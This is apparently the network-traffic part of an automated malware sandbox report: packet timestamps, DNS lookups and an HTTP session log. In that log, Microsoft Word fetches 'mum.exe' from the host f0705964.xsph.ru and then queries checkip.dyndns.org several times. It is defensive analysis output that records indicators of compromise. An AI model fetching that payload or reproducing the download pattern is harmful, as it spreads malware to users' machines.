                                    Aug 23, 2022 13:42:52.834217072 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834228992 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834244013 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834271908 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834294081 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834299088 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834325075 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834336996 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834352016 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834376097 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834392071 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834400892 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834425926 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834434986 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834450960 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834477901 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834487915 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834503889 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834527969 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834541082 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834553003 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834578037 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834588051 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834602118 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834629059 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834645987 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834654093 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834680080 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834697962 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.834707022 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.834747076 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887386084 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887418985 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887434959 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887445927 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887471914 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887492895 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887545109 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887564898 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887583971 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887597084 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887603045 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887622118 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887622118 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887636900 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887641907 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887660980 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887680054 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887682915 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887700081 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887718916 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887738943 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887742996 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887758970 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887758970 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887778044 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887795925 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887797117 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887818098 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887836933 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887840033 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887856960 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887878895 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887881994 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887906075 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887923002 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887924910 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.887964964 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.887979984 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.888084888 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.891961098 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.891993046 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892019987 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892040014 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892059088 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892077923 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892096043 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892115116 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892122030 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892133951 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892142057 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892153978 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892172098 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892174959 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892190933 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892210007 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892210960 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892230034 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892249107 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892256021 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892266989 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892282009 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892286062 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892328024 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892334938 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892354965 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892374039 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892393112 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892398119 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892412901 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892430067 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892433882 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892453909 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892472982 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892472982 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892493010 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892512083 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892514944 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892532110 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892550945 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892551899 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892570972 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892591000 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892591953 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892611027 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892631054 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892636061 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892649889 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892661095 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892683029 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892702103 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892720938 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892723083 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892745972 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892765999 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892765999 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892807007 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892827034 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892848015 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892868042 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892889023 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892889977 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892910004 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892930031 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892930984 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892951012 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892966986 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.892971039 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.892991066 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893008947 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893011093 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893030882 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893050909 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893060923 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893069983 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893086910 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893089056 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893110037 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893129110 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893131018 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893150091 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893167019 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893167973 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893188000 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893207073 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893210888 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893227100 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893248081 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893249035 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893266916 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893285990 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893285990 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893306017 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893326044 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893326044 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893346071 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893364906 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893367052 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893384933 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893405914 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893405914 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893425941 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893445969 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893445969 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893465996 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893486023 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893486977 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893505096 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893524885 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893524885 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893544912 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893560886 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893564939 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893585920 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893604994 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893604994 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893625021 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893644094 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893644094 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893663883 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893681049 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:52.893682003 CEST8049172141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:42:52.893723011 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:42:53.170523882 CEST4917280192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:43:14.053689003 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:43:14.344074965 CEST8049173132.226.8.169192.168.2.22
                                    Aug 23, 2022 13:43:14.344182014 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:43:14.345360994 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:43:14.636540890 CEST8049173132.226.8.169192.168.2.22
                                    Aug 23, 2022 13:43:14.637011051 CEST8049173132.226.8.169192.168.2.22
                                    Aug 23, 2022 13:43:14.845710993 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:43:18.786492109 CEST8049171141.8.192.151192.168.2.22
                                    Aug 23, 2022 13:43:18.786685944 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:43:29.137904882 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:29.254971981 CEST8049174193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:29.255063057 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:29.255486965 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:29.372117043 CEST8049174193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:29.372759104 CEST8049174193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:29.573406935 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:56.693656921 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:56.801500082 CEST8049175193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:56.801636934 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:56.802113056 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:43:56.909341097 CEST8049175193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:56.912651062 CEST8049175193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:43:57.125497103 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:44:19.638036013 CEST8049173132.226.8.169192.168.2.22
                                    Aug 23, 2022 13:44:19.638237000 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:44:34.373033047 CEST8049174193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:44:34.373327017 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:44:41.008975983 CEST4917180192.168.2.22141.8.192.151
                                    Aug 23, 2022 13:44:54.664697886 CEST4917380192.168.2.22132.226.8.169
                                    Aug 23, 2022 13:44:54.954910040 CEST8049173132.226.8.169192.168.2.22
                                    Aug 23, 2022 13:45:01.916018963 CEST8049175193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:45:01.916230917 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:45:09.407668114 CEST4917480192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:45:09.524648905 CEST8049174193.122.130.0192.168.2.22
                                    Aug 23, 2022 13:45:36.943948030 CEST4917580192.168.2.22193.122.130.0
                                    Aug 23, 2022 13:45:37.051424026 CEST8049175193.122.130.0192.168.2.22
                                    TimestampSource PortDest PortSource IPDest IP
                                    Aug 23, 2022 13:42:48.224495888 CEST5586853192.168.2.228.8.8.8
                                    Aug 23, 2022 13:42:48.254108906 CEST53558688.8.8.8192.168.2.22
                                    Aug 23, 2022 13:42:52.293247938 CEST4968853192.168.2.228.8.8.8
                                    Aug 23, 2022 13:42:52.322635889 CEST53496888.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:13.836421013 CEST5883653192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:13.855165005 CEST53588368.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:13.966589928 CEST5013453192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:13.984965086 CEST53501348.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:28.999905109 CEST5527553192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:29.018554926 CEST53552758.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:29.073710918 CEST5991553192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:29.092278004 CEST53599158.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:56.593293905 CEST5440853192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:56.611607075 CEST53544088.8.8.8192.168.2.22
                                    Aug 23, 2022 13:43:56.632891893 CEST5010853192.168.2.228.8.8.8
                                    Aug 23, 2022 13:43:56.651561975 CEST53501088.8.8.8192.168.2.22
                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                    Aug 23, 2022 13:42:48.224495888 CEST192.168.2.228.8.8.80x71efStandard query (0)f0705964.xsph.ruA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:42:52.293247938 CEST192.168.2.228.8.8.80x7a06Standard query (0)f0705964.xsph.ruA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.836421013 CEST192.168.2.228.8.8.80xdf4cStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.966589928 CEST192.168.2.228.8.8.80x9dabStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:28.999905109 CEST192.168.2.228.8.8.80xa50bStandard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.073710918 CEST192.168.2.228.8.8.80x56f9Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.593293905 CEST192.168.2.228.8.8.80x17f4Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.632891893 CEST192.168.2.228.8.8.80x5607Standard query (0)checkip.dyndns.orgA (IP address)IN (0x0001)
                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                    Aug 23, 2022 13:42:48.254108906 CEST8.8.8.8192.168.2.220x71efNo error (0)f0705964.xsph.ru141.8.192.151A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:42:52.322635889 CEST8.8.8.8192.168.2.220x7a06No error (0)f0705964.xsph.ru141.8.192.151A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.855165005 CEST8.8.8.8192.168.2.220xdf4cNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:13.984965086 CEST8.8.8.8192.168.2.220x9dabNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.018554926 CEST8.8.8.8192.168.2.220xa50bNo error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:29.092278004 CEST8.8.8.8192.168.2.220x56f9No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.611607075 CEST8.8.8.8192.168.2.220x17f4No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.orgcheckip.dyndns.comCNAME (Canonical name)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.com132.226.247.73A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.com158.101.44.242A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.com132.226.8.169A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.com193.122.130.0A (IP address)IN (0x0001)
                                    Aug 23, 2022 13:43:56.651561975 CEST8.8.8.8192.168.2.220x5607No error (0)checkip.dyndns.com193.122.6.168A (IP address)IN (0x0001)
                                    • f0705964.xsph.ru
                                    • checkip.dyndns.org
                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                    0192.168.2.2249171141.8.192.15180C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                    TimestampkBytes transferredDirectionData
                                    Aug 23, 2022 13:42:48.336560965 CEST0OUTGET /mum.exe HTTP/1.1
                                    Accept: */*
                                    UA-CPU: AMD64
                                    Accept-Encoding: gzip, deflate
